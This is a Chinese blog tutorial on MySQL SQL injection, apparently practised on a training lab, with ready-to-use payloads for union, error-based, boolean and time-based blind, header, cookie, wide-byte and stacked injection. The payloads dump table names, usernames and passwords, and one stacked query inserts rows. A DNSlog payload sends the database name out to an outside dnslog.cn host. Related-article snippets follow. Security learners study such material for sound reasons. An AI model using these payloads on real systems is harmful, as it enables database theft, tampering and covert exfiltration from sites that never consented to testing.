SQL注入(MySQL)

最新推荐文章于 2024-04-04 01:08:50 发布
最新推荐文章于 2024-04-04 01:08:50 发布
阅读量971 收藏 21
点赞数 23
文章标签: 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jxy158212/article/details/135332811
版权

一、MySQL数据库

初始化安装mysql数据库后,会默认建立四个系统数据库

这张表将用于后续的注入

二、如何判断数据库类型

1、通过文件后缀

  • .php的网站,常用数据库为MySQL、PostgreSQL

2、通过端口判断

  • MySQL:3306
  • PostgreSQL:5432

了解了一些基础知识后,我们接下来根据不同的注入举例说明

三、联合查询注入

1、原理

  • union用于连接两个以上的select语句。前提是两个select必须有相同列
  • 注入点前面有查询语句,我们可以通过union连接我们要查询的数据
  • 由于前后查询语句需要有相同列,所有我们需要先判断注入点的列数。
  • 我们通过order by判断。当order by字段数<注入点列数,显示正常;当order by字段数>注入点列数,出错

2、联合查询步骤

  • 判断注入点
  • 判断注入点字段数
  • 确定显示的字段数
  • 获取数据库中的表以及更多数据

3、案例

step1:判断注入点

依次输入' '' '''

可以得出存在注入,并且是‘闭合

step2:判断注入点字段数

?id=1'order by 3--+

?id=1'order by 4--+

可以得到,字段数为3

step3:确定显示的字段数

?id=-1'union select 1,2,3--+

这里将id的值设为-1(表中不存在的数据),从而显示后面select 1,2,3的内容

得到显示字段为2,3

step4:获取数据库中的表以及更多数据

①获取数据库名
?id=-1'union select 1,database(),3--+

②获取表名
?id=-1'union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3--+
  • group_concat():将group by产生的同一个分组中的值连接起来,返回一个字符串结果
  • 由MySQL数据库的结构可知,information_schema.tables存放了不同数据库的表

③获取user表的字段名
?id=-1'union select 1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),3--+

由MySQL数据库的结构可知,information_schema.columns存放了不同数据库中表的字段

④获取账号
?id=-1'union select 1,(select group_concat(username)from security.users),3--+

四、报错注入

1、原理

当输入内容有错时,页面会返回错误信息(如在xx附近语法错误),或者把注入的语句的。这时可以结合报错函数得到想要的数据

2、报错函数

  • updatexml(xml_document,XPath_string,new_value)
  • extractvalue(xml_frag,xpath_expr)

若xpath_expr参数不符合xpath格式,就会报错,在后续的练习中,我们使用到~符号(ascii码为0x7e)引发报错

3、练习

step1:判断注入点

由前面可以看到,在页面上会显示错误信息,接下来我们使用报错函数获取数据

step2:得到数据库名以及更多数据

①获取数据库名
?id=1'and extractvalue(1,concat(0x7e,database(),0x7e))--+
  • concat()--字符串连接
  • concat(0x7e,database(),0x7e)--database()前后都连接0x7e,避免因为显示长度的限制无法完整显示出数据时我们不知道
  • 如果出现数据无法完全显示,可以使用截取函数substr()、left()等分批获得数据

②获取表名
?id=1'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+

③获取字段名
?id=1'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

④获取账号密码
?id=1'and extractvalue(1,concat(0x7e,(select concat(username,'~',password) from security.users limit 0,1),0x7e))--+

五、盲目注入

1、布尔注入

①原理

Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。

②练习

step1:判断是否存在注入

step2:获得数据库名
使用burp对数据库长度进行破解
'+and+length(database())=1--+

这里要破解的是数据库名字长度,payload类型便设置为Number,填写数据库名字大致的长度范围

根据length判断正确的数据,得到长度为8

得到数据库名的长度为8后,使用substr函数继续破解每个位置的字母
'+and+substr(database(),1,1)='a'--+

使用Cluster bomb

payload1对应的范围为1-8

payload2需要填写所有的组成符号

根据回显时间得到正确的数据

2、盲目注入

①原理

界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数(sleep),通过查看web页面返回的时间差来判断注入的语句是否正确。

使用sleep函数:判断是否存在时间盲注,1'+and+sleep(5)--+。返回超过5秒,说明存在时间盲注

②练习

step1:判断是否存在注入
admin'+and+if(1=1,sleep(3),0)#

step2:得到数据库名及更多信息
①使用burp对数据库长度进行破解
admin'+and+if(length(database())=1,sleep(3),0)#

这里要破解的是数据库名字长度,payload类型便设置为Number,填写数据库名字大致的长度范围

根据回显时间长度判断为真情况

②得到数据库名的长度为8后,使用substr函数继续破解每个位置的字母
admin'+and+if(substr(database(),1,1)='a',sleep(3),0)#

使用Cluster bomb

payload1对应的范围为1-8

Payload2是需要破解的字母,选择类型为simple list

根据回显时间得到正确的数据

根据不同位置对应的字母,得到数据库名为security

六、UA注入

1、原理

有些网站会把用户的UA信息写入数据库,用来收集和统计用户信息, 此时就有可能存在UA 头注入,一般会把数据插入到某张表中所以可以用报错注入。

2、练习

step1:判断存在注入

step2:使用brup抓包,修改UA头注入,其他与报错注入类似

结合之前的报错注入,可以得到更多的数据

七、referer注入

1、原理

当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的,大部分网站或者app都会写入数据库用来分析量从哪里来,以及统计广告投入的成本 ,一般会把数据插入到某张表中所以可以用报错注入。

2、练习

使用brup抓包,修改referer头注入,其他与报错注入类似

八、dnslong外带

1、原理

我们输入域名之后 我们的本地域名服务器会把在自身服务器里面查询是否存在ip地址 如果没有则发送到根域名服务器 如果根域名服务器里面有对应的记录则返回 如果没有则告诉本地域名服务器去向顶级域名服务器查找。

dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在ns服务器的dns日志中显示出来。

2、练习

' and (select load_file(concat('\\',(select database()),'.4me948.dnslog.cn/abc'))) --+

九、cookie注入

1、原理

对get传递来的参数进行了过滤,但是忽略了cookie也可以传递参数

修改自身cookie , 后台获取到这个cookie后 , 会直接拿去数据库里面进行比较 , 比较的时候就有可能注入

2、练习

在输入一个正确的账号和密码后,使用burp进行抓包

在cookie栏依次输入' '' '''发现存在周期性变化 那么说明存在注入点

使用报错函数得到数据库名

十、宽字节注入

1、原理

数据库使用gbk编码的时候,会将两个字符合并成一个中文。 特殊值字符如单引号都会被转义 ' -> '

mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%df%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)

所以如果我们输入%df%27(%27就是单引符号会被转义成' 也就是%5c%27),在后台%df会将%5c“吃掉”,组成一个汉字(%df%5c是一个汉字)

2、练习

这里结合联合注入得到数据库名(就不细讲了)

?id=-1%df%27union select 1,(database()),3--+

十一、堆叠注入

1、原理

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。

联合注入和堆叠注入的区别: 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。

2、练习

?sort=1;insert into users values(22,1,1)

成功插入

哈哈。。。。。。
关注
  • 23
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入实验详细过程及讲解
2302_78587828的博客
08-14 2229
SQL 注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
MySQL SQL 注入
小小博客爱分享
07-29 182
本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 SQL注入可能是目前互联网上存在的最丰富的编程缺陷。 这是未经授权的人可以访问各种关键和私人数据的漏洞。 SQL注入不是Web数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 它是从远程位置执行的最致命和最容易的攻击之一。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到
MySQLSQL注入
01-21
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么有可能发生SQL注入安全的问题。   本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。   所谓SQL注入,是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,终达到欺骗服务器执行恶意的SQL命令。   我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。   以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间:   if (preg_match(/^w{8,20}$/
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
SQL注入---报错注入
最新发布
zhoutong2323的博客
04-04 441
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
PHP+MysqlSQL注入源码 下载
01-01
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
Sql注入详解(原理篇)
Naive的博客
09-11 7686
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入原理及思路(mysql
weixin_65049289的博客
12-05 301
SQL注入原理及思路(mysql
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1224
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
sql各种注入案例
m0_69435261的博客
09-01 4731
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
sql注入实例
weixin_45901902的博客
11-11 4748
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就通过这个实例来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下: 1 SELECT*FromTableWHEREName...
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4844
sql注入详解
SQL注入Mysql):
qi_SJQ_的博客
11-06 469
1.参数闭合: 数字型大部分情况不用闭合。 字符型需要闭合的有:单/双引号、小/大括号、百分号、引号组合括号。 2.请求方法判断: 在network控制台一般可以看到,或者抓包查看。 get、post、request、cookie、http头等。 ...
MySQL 及 SQL 注入
12-16
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到...
SQL注入MYSQL注入
av11566的博客
04-19 7008
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
mysql sql注入工具_基础篇——SQL注入(工具注入
weixin_42460182的博客
01-19 523
注入工具上一篇介绍了SQL注入漏洞以及一些手工注入方法,本篇介绍一下注入工具1、sqlmapsqlmap属于比较经典的一个注入工具,功能强大,还自带一些绕过参数使用方法:sqlmap.py -u “url” 对url连接进行注入检测然后使用注入参数进行注入-u //添加url进行检测-dbs //进行数据库检测-tables //猜解数据库表-colums //猜解字段--level 1...
简要MYSQL注入
山兔的博客
03-31 497
SQL注入,一般不是一些低权限的,都会被认为是很严重的漏洞,不是所有的SQL注入都可以对网站后台进行getshell,它是需要条件的,这个条件我们称为权限。有的注入点,它是没有办法进行getshell的,他只能得到一些敏感信息,然后我们在一步步的去获取权限SQL注入的危害有两个,一个是危害到数据,一个是危害到网站的权限,满足条件的注入点就可以,没有这个条件的就不行。
【无标题】SQL注入——MYSQL
m0_48222671的博客
04-21 2819
MYSQL注入一、SQL注入产生的条件二、判断注入点三、注入步骤1.猜解列名数量2.报错猜解3.查看当前数据库4.查看数据库名5.查看数据库表名6.查询admin列名7.查询user中的username 一、SQL注入产生的条件 可控变量 参数带入数据库查询 变量未经过过滤或过滤不严谨 二、判断注入点 下面的方法也知识可能存在,如果有404或者跳转,则没有注入 id=1 and 1=1 页面正常 id=1 and 1=1 页面错误 三、注入步骤 以判断存在注入 1.猜解列名数量 id=1 ord
SQL注入案例演示与防范措施大全
热门推荐
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
墨者sql注入mysql
09-29
墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握手工注入的方法。然后,他可以使用字符串的MD5加解密技术来解密密码。 第二种方法是使用工具注入,如sqlmap。墨者可以使用sqlmap工具来爆破数据库名和当前用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值